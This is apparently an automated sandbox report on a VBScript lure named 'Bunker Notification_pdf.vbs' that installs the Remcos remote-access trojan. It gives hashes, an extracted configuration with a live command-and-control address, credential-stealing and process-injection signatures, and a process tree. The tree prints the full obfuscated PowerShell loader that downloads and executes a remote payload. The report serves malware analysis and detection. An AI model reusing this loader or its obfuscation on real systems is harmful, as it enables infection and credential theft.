Analysis
-
max time kernel
298s -
max time network
286s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 11:02
Static task
static1
Behavioral task
behavioral1
Sample
Bunker Notification_pdf.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Bunker Notification_pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
Bunker Notification_pdf.vbs
-
Size
38KB
-
MD5
da585c076f85367266cc0c6278863775
-
SHA1
5f20adced6dcac42336a587c4c99036098f75691
-
SHA256
1bd7e51b56b53d6522565bee13bf0fe855b27ff37cddcc4d71cfced82e01e86f
-
SHA512
da39a7bb7d92eadcd50b06d6c12cf9f10b4e5aa3ec6a201984f41556ea9825948ec03cc1a47c07ba7fb50169b9eb3d95fb7bc1efa78b54c7ac180723ef95cb52
-
SSDEEP
768:CJLtBS6wlVggNDAAE1yU2QLIeG34mMEeVMSjBLf20KnHtTkoi3zToBEWLuJP:CJJBSxNDlE1y8Lps4mMEXSlLf54koiXJ
Malware Config
Extracted
remcos
RemoteHost
154.216.18.214:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-AOD6MB
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/3088-69-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2356-73-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4616-67-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/2356-73-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/4616-67-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 7 IoCs
Processes:
WScript.exepowershell.exemsiexec.exeflow pid process 4 3248 WScript.exe 12 232 powershell.exe 34 1868 msiexec.exe 36 1868 msiexec.exe 38 1868 msiexec.exe 39 1868 msiexec.exe 41 1868 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WScript.exedescription ioc process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid process 1868 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid process 2696 powershell.exe 1868 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
msiexec.exedescription pid process target process PID 1868 set thread context of 4616 1868 msiexec.exe msiexec.exe PID 1868 set thread context of 2356 1868 msiexec.exe msiexec.exe PID 1868 set thread context of 3088 1868 msiexec.exe msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
msiexec.exemsiexec.exepowershell.exemsiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 232 powershell.exe 232 powershell.exe 2696 powershell.exe 2696 powershell.exe 2696 powershell.exe 4616 msiexec.exe 4616 msiexec.exe 3088 msiexec.exe 3088 msiexec.exe 4616 msiexec.exe 4616 msiexec.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exemsiexec.exepid process 2696 powershell.exe 1868 msiexec.exe 1868 msiexec.exe 1868 msiexec.exe 1868 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 232 powershell.exe Token: SeDebugPrivilege 2696 powershell.exe Token: SeDebugPrivilege 3088 msiexec.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
WScript.exepowershell.exemsiexec.exedescription pid process target process PID 3248 wrote to memory of 232 3248 WScript.exe powershell.exe PID 3248 wrote to memory of 232 3248 WScript.exe powershell.exe PID 2696 wrote to memory of 1868 2696 powershell.exe msiexec.exe PID 2696 wrote to memory of 1868 2696 powershell.exe msiexec.exe PID 2696 wrote to memory of 1868 2696 powershell.exe msiexec.exe PID 2696 wrote to memory of 1868 2696 powershell.exe msiexec.exe PID 1868 wrote to memory of 4616 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 4616 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 4616 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 4616 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 2164 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 2164 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 2164 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 2356 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 2356 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 2356 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 2356 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 3088 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 3088 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 3088 1868 msiexec.exe msiexec.exe PID 1868 wrote to memory of 3088 1868 msiexec.exe msiexec.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Bunker Notification_pdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#subbasal sugerrs Neutrodyne Russophobia Cockneyernes Flatlets Foderalerne #><#Forvorpen exanimated Kanaljers #>$streptococci='Unsubmissive';function svingtud($Restskatters){If ($host.DebuggerEnabled) {$Corymbose36=3} for ($shaper=$Corymbose36;;$shaper+=4){if(!$Restskatters[$shaper]) { break }$Potentizes+=$Restskatters[$shaper]}$Potentizes}function uafladelige($Hepatomas){ .($saxonic) ($Hepatomas)}$Anthorine=svingtud 'HaeN.asENont nd.b jwPe,EOspbGerC KiLCreI Che Nun,nit';$Overkommer=svingtud 'ArbM.naoKiszC eiAsslIlll kmaKli/';$Mrkbare=svingtud 'R cTRuml fosHym1I.d2';$Knurre='Ted[ idn u e elt Al. AsssylEGraRkamVmonIDruc naEConpPeaOAflipron MaT AdmPreAHoensquaU.sGP ieTolrDob]Utr: Id: BlscogEOp CTeru P R miIbarTCery OuPLi.r,oro D,tdepo OxcD,uOsecl Op=Hgt$tr,mArvRN tk O.BRouALarrslae';$Overkommer+=svingtud 'Myr5Udf.afs0Co, Red(M rWchiisugnRa dBlooshewsigsgen sigN c T Ps Fje1sum0Rec.Jus0Rap;Brn onWspiiHinnFro6Cam4Jor;Lym Hux ag6Kad4Mol;skr My rArcv s :An 1Vi 3 ru1 .k.Jog0 T )Aut OdlG sleErgc orksemoFor/ sw2 Ch0Unr1Bid0Uls0Udl1Hoo0Ang1 et stvFHstiBarr KeeYeofEdioB exFol/ Pa1 .o3Enl1 ep.Rea0';$Fremlejens=svingtud 'bloUFa.sParEIntROms-GrnADasg,ule BrN MeT';$skravl=svingtud ' AnhEpit act Dep acsN n:H b/Bu,/.ozbUnf9Ruta s 1Be . sti Enclodusko/ douMoiLNonhCheD reGsovgKomaHalY ka/ peTv.ra gguLadtFr nD peBetsChos o,.FritDe hRefn';$shaperntimiteterne=svingtud 'Du,>';$saxonic=svingtud 's ri ,hEHenX';$Anbringendernes184='Restanternes166';$Afsindiges='\Busbaner195.Odo';uafladelige (svingtud 'In,$D.gG flLberOKomBs ea MrlPe : PrsHa.e oG emgWorIHirO C =Mng$UncE senKhwvNon:,usaun pEftPGondHerAAnttFe,aAfk+sub$Br AUriFDeisBugiPolNTrad oaiEx,g VeE Efs');uafladelige (svingtud ' K $ Fag s.lPetODedbsoyaPosLEol: shVAprK hisChat Usc Vie Udn atPa,rBerE Un= l$FonsTyekskrRUm aElevFd.LBun. s,ss oP PoL WhI ortste(Afk$OpssConhUdsaBraPNogEs kr ennUnitAttI TeM ,yIAvntAn.eTritRe EPe.rPornReae h)');uafladelige (svingtud $Knurre);$skravl=$Vkstcentre[0];$Abounds=(svingtud ' Ci$ AfGBonL,osO Hub.kea Pol ac: sinsanoAngr.esM BaA DrlsictCome Pam oPs.eespiRch aA etstouA tREn ELu N AcsJ u=D sNReeeQuiwsam-FasovicBsekJArtespaCstot ,n PlesIndY nhsP aTImbese mPar. Bo$Drua GanPriTUreHRacOLe RColI MnNLarE');uafladelige ($Abounds);uafladelige (svingtud ' a$PerN.ndospirEqum Fna .il BetCone .amst.p cheBakrLysasiltP ruPaar L eskanNonsInd.IncHUnce Tyar,ld ouemusr RysGra[Han$UdsFPserhkle FomsiplP oeElejO leClon sts Ci]si =spo$IntOswevkale TwrDelk ruo DemUl mN.te Bar');$successorer62=svingtud 'Pre$.otNspeo LnrdsimCiraDell CatAxieBedmKikpMuce Her Cha Pot Rrutotr orestrn H,s sa. dpD Cho PhwPronstrlPeroNonaUdkdFraFRosi nll,neeNyd(Pro$Blgs ek ecr Flasnov atl,om,Tum$staB FooPanpAntl Tve OvnOph1.ar0 Ge0Alb)';$Boplen100=$seggio;uafladelige (svingtud ' Ga$AelG A lI tOChab rA ThlEd.:Jult A AHugNDi ITvaAO lsFer=I,c(ForTPeieArrsisoT.is- isPNonA ut HeH Ud Ops$ isbF cO rpFreL liEDucNRet1rou0s n0Pal)');while (!$Tanias) {uafladelige (svingtud 'Pro$TorgRadlscoo NubRegaOctl st:sydLseleInsdAnkdEp e Blldisssolt a=Ob $YanY areRess V.esebs') ;uafladelige $successorer62;uafladelige (svingtud 'Nonss,dTOrpAskarschTUnh-Hyls saL eve .ie.ouPCoc Mu4');uafladelige (svingtud 'Af $BolGBi LPriO rebWe A Tilne :Tr TTalastanAfliTjrA Pes Ka=,il(TiltCa eMegsschtAsa-RhaPd dANe t hihP e Mo$.leBsocO RepI fL F.estrNUnt1 In0sip0Dub)') ;uafladelige (svingtud 'Far$s rG haLGyaOsytBVenaNaal so: anmMedEGasTstaAEkssYd,T LeEO tR henFeaAsubLKom=Haz$ GegKnfLMaioOpfBopkA Pal,il:UarsBamABrumTitMLites rNPr,sAu PGeraVelrLat+All+Aft%sga$paavsvak rnstr Tstec HeePten PrTC mrUd.EG.a. kkc OkOAzou jnGlat') ;$skravl=$Vkstcentre[$Metasternal]}$shaperrreducibilities=281291;$Euforiseringens=29073;uafladelige (svingtud 'ste$ taGsneLPo,o muB,faA.raLCha:sc s,mslOveuso.tBeddsjaIPalsVksPspio aan oreRacrsamiV dnUntG ipEChaRUdmNLiseCzasMob L.t=G.g Ga gstee EutBat-CoucAteOGriNA rtEpieTeln,umtFlo wef$O eb OvOGasP KaLAfmE,reNAnt1Ud,0Pks0');uafladelige (svingtud 'Lin$FregKerlForoB.sbCenaPrelBes:UndsTilkKnoy feg ungDire InrMo nKare .osJet Rho=Rea Pa [ab sR syautsLegt F eArim Ma.V.lC M,oHofnVehva ne A rContMoo]Des:Dob:R nF sar kloConmBemBsana.xys ske sa6Lad4 nesCl,tE.orProiBagn R.gFis(Pav$IndsstnlYamusl tTildseeistusForpKleoMohn ree AnrOpei ivnrengB lesu,rAnknswieLyss b,)');uafladelige (svingtud 'Era$myogs hlRhaoUngBVakAstrlTid:MusR eeELiklM lA,cets.lI rrVMatEYelTBak Coy= Pl B.c[seps AfyNonsMisTForenermBo..su tJorEDy,XT btf.m. .ue,otnAntc KvoAs DMuli unOveGGud] Tl:Iph:MidA mesTrockloi GuICou. sag.uge rutEkssschtPrersa.iHjdNMaug je(Ves$strssn,KArryArbG dG.ncEs rRTeaNanseskas .s)');uafladelige (svingtud 'Cat$.ouGol,LOveoBatb roAFisLsu.: rROffI DiCDepEH ab U.IMi rKonDBors Va=Rus$MedR TrE Exl PyARetTGt ITr vsvre bbtPas. ris,oru ytb,dmsBryTPter ntiWioNGy g Am( Kr$Tyrs teh vaAforp,orEAnkRIodRTisRRe esrvdskiuUnmcTraIMe B,iaIRekLAmiIUtat lIs,iE UbsGar,Put$GelEEsmuOveFUdsORivrNyoi kosac eA yrAu.I seN DeG,ygeserNWhis t)');uafladelige $Ricebirds;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:232
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#subbasal sugerrs Neutrodyne Russophobia Cockneyernes Flatlets Foderalerne #><#Forvorpen exanimated Kanaljers #>$streptococci='Unsubmissive';function svingtud($Restskatters){If ($host.DebuggerEnabled) {$Corymbose36=3} for ($shaper=$Corymbose36;;$shaper+=4){if(!$Restskatters[$shaper]) { break }$Potentizes+=$Restskatters[$shaper]}$Potentizes}function uafladelige($Hepatomas){ .($saxonic) ($Hepatomas)}$Anthorine=svingtud 'HaeN.asENont nd.b jwPe,EOspbGerC KiLCreI Che Nun,nit';$Overkommer=svingtud 'ArbM.naoKiszC eiAsslIlll kmaKli/';$Mrkbare=svingtud 'R cTRuml fosHym1I.d2';$Knurre='Ted[ idn u e elt Al. AsssylEGraRkamVmonIDruc naEConpPeaOAflipron MaT AdmPreAHoensquaU.sGP ieTolrDob]Utr: Id: BlscogEOp CTeru P R miIbarTCery OuPLi.r,oro D,tdepo OxcD,uOsecl Op=Hgt$tr,mArvRN tk O.BRouALarrslae';$Overkommer+=svingtud 'Myr5Udf.afs0Co, Red(M rWchiisugnRa dBlooshewsigsgen sigN c T Ps Fje1sum0Rec.Jus0Rap;Brn onWspiiHinnFro6Cam4Jor;Lym Hux ag6Kad4Mol;skr My rArcv s :An 1Vi 3 ru1 .k.Jog0 T )Aut OdlG sleErgc orksemoFor/ sw2 Ch0Unr1Bid0Uls0Udl1Hoo0Ang1 et stvFHstiBarr KeeYeofEdioB exFol/ Pa1 .o3Enl1 ep.Rea0';$Fremlejens=svingtud 'bloUFa.sParEIntROms-GrnADasg,ule BrN MeT';$skravl=svingtud ' AnhEpit act Dep acsN n:H b/Bu,/.ozbUnf9Ruta s 1Be . sti Enclodusko/ douMoiLNonhCheD reGsovgKomaHalY ka/ peTv.ra gguLadtFr nD peBetsChos o,.FritDe hRefn';$shaperntimiteterne=svingtud 'Du,>';$saxonic=svingtud 's ri ,hEHenX';$Anbringendernes184='Restanternes166';$Afsindiges='\Busbaner195.Odo';uafladelige (svingtud 'In,$D.gG flLberOKomBs ea MrlPe : PrsHa.e oG emgWorIHirO C =Mng$UncE senKhwvNon:,usaun pEftPGondHerAAnttFe,aAfk+sub$Br AUriFDeisBugiPolNTrad oaiEx,g VeE Efs');uafladelige (svingtud ' K $ Fag s.lPetODedbsoyaPosLEol: shVAprK hisChat Usc Vie Udn atPa,rBerE Un= l$FonsTyekskrRUm aElevFd.LBun. s,ss oP PoL WhI ortste(Afk$OpssConhUdsaBraPNogEs kr ennUnitAttI TeM ,yIAvntAn.eTritRe EPe.rPornReae h)');uafladelige (svingtud $Knurre);$skravl=$Vkstcentre[0];$Abounds=(svingtud ' Ci$ AfGBonL,osO Hub.kea Pol ac: sinsanoAngr.esM BaA DrlsictCome Pam oPs.eespiRch aA etstouA tREn ELu N AcsJ u=D sNReeeQuiwsam-FasovicBsekJArtespaCstot ,n PlesIndY nhsP aTImbese mPar. Bo$Drua GanPriTUreHRacOLe RColI MnNLarE');uafladelige ($Abounds);uafladelige (svingtud ' a$PerN.ndospirEqum Fna .il BetCone .amst.p cheBakrLysasiltP ruPaar L eskanNonsInd.IncHUnce Tyar,ld ouemusr RysGra[Han$UdsFPserhkle FomsiplP oeElejO leClon sts Ci]si =spo$IntOswevkale TwrDelk ruo DemUl mN.te Bar');$successorer62=svingtud 'Pre$.otNspeo LnrdsimCiraDell CatAxieBedmKikpMuce Her Cha Pot Rrutotr orestrn H,s sa. dpD Cho PhwPronstrlPeroNonaUdkdFraFRosi nll,neeNyd(Pro$Blgs ek ecr Flasnov atl,om,Tum$staB FooPanpAntl Tve OvnOph1.ar0 Ge0Alb)';$Boplen100=$seggio;uafladelige (svingtud ' Ga$AelG A lI tOChab rA ThlEd.:Jult A AHugNDi ITvaAO lsFer=I,c(ForTPeieArrsisoT.is- isPNonA ut HeH Ud Ops$ isbF cO rpFreL liEDucNRet1rou0s n0Pal)');while (!$Tanias) {uafladelige (svingtud 'Pro$TorgRadlscoo NubRegaOctl st:sydLseleInsdAnkdEp e Blldisssolt a=Ob $YanY areRess V.esebs') ;uafladelige $successorer62;uafladelige (svingtud 'Nonss,dTOrpAskarschTUnh-Hyls saL eve .ie.ouPCoc Mu4');uafladelige (svingtud 'Af $BolGBi LPriO rebWe A Tilne :Tr TTalastanAfliTjrA Pes Ka=,il(TiltCa eMegsschtAsa-RhaPd dANe t hihP e Mo$.leBsocO RepI fL F.estrNUnt1 In0sip0Dub)') ;uafladelige (svingtud 'Far$s rG haLGyaOsytBVenaNaal so: anmMedEGasTstaAEkssYd,T LeEO tR henFeaAsubLKom=Haz$ GegKnfLMaioOpfBopkA Pal,il:UarsBamABrumTitMLites rNPr,sAu PGeraVelrLat+All+Aft%sga$paavsvak rnstr Tstec HeePten PrTC mrUd.EG.a. kkc OkOAzou jnGlat') ;$skravl=$Vkstcentre[$Metasternal]}$shaperrreducibilities=281291;$Euforiseringens=29073;uafladelige (svingtud 'ste$ taGsneLPo,o muB,faA.raLCha:sc s,mslOveuso.tBeddsjaIPalsVksPspio aan oreRacrsamiV dnUntG ipEChaRUdmNLiseCzasMob L.t=G.g Ga gstee EutBat-CoucAteOGriNA rtEpieTeln,umtFlo wef$O eb OvOGasP KaLAfmE,reNAnt1Ud,0Pks0');uafladelige (svingtud 'Lin$FregKerlForoB.sbCenaPrelBes:UndsTilkKnoy feg ungDire InrMo nKare .osJet Rho=Rea Pa [ab sR syautsLegt F eArim Ma.V.lC M,oHofnVehva ne A rContMoo]Des:Dob:R nF sar kloConmBemBsana.xys ske sa6Lad4 nesCl,tE.orProiBagn R.gFis(Pav$IndsstnlYamusl tTildseeistusForpKleoMohn ree AnrOpei ivnrengB lesu,rAnknswieLyss b,)');uafladelige (svingtud 'Era$myogs hlRhaoUngBVakAstrlTid:MusR eeELiklM lA,cets.lI rrVMatEYelTBak Coy= Pl B.c[seps AfyNonsMisTForenermBo..su tJorEDy,XT btf.m. .ue,otnAntc KvoAs DMuli unOveGGud] Tl:Iph:MidA mesTrockloi GuICou. sag.uge rutEkssschtPrersa.iHjdNMaug je(Ves$strssn,KArryArbG dG.ncEs rRTeaNanseskas .s)');uafladelige (svingtud 'Cat$.ouGol,LOveoBatb roAFisLsu.: rROffI DiCDepEH ab U.IMi rKonDBors Va=Rus$MedR TrE Exl PyARetTGt ITr vsvre bbtPas. ris,oru ytb,dmsBryTPter ntiWioNGy g Am( Kr$Tyrs teh vaAforp,orEAnkRIodRTisRRe esrvdskiuUnmcTraIMe B,iaIRekLAmiIUtat lIs,iE UbsGar,Put$GelEEsmuOveFUdsORivrNyoi kosac eA yrAu.I seN DeG,ygeserNWhis t)');uafladelige $Ricebirds;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vdbhmiscolkbpqwewpzryvr"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4616
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fxgzmbddktcgawkigzusbiequt"3⤵PID:2164
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\fxgzmbddktcgawkigzusbiequt"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2356
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\qzukntoxxbulccgmxkgmmnygczmyyl"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3088
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD560a0bdc1cf495566ff810105d728af4a
SHA1243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6
SHA256fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2
SHA5124445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5
-
Filesize
404KB
MD5e640d575f116fa96231b21a13e947fff
SHA15c6a64428ab9476109c11485d99aab34cbc65826
SHA256c06a9036d4a7ff15f0520c93ac0446611a2a0baf3114de595ad61e42adc507fd
SHA512c9e7d42e8e1113309d9c4db52cd0b0e67272ca11033aec6e685506e702d445d8c721d0ca40257413f246d256545e63ce89747b9f08dcf1bea7ffd88fb04b9067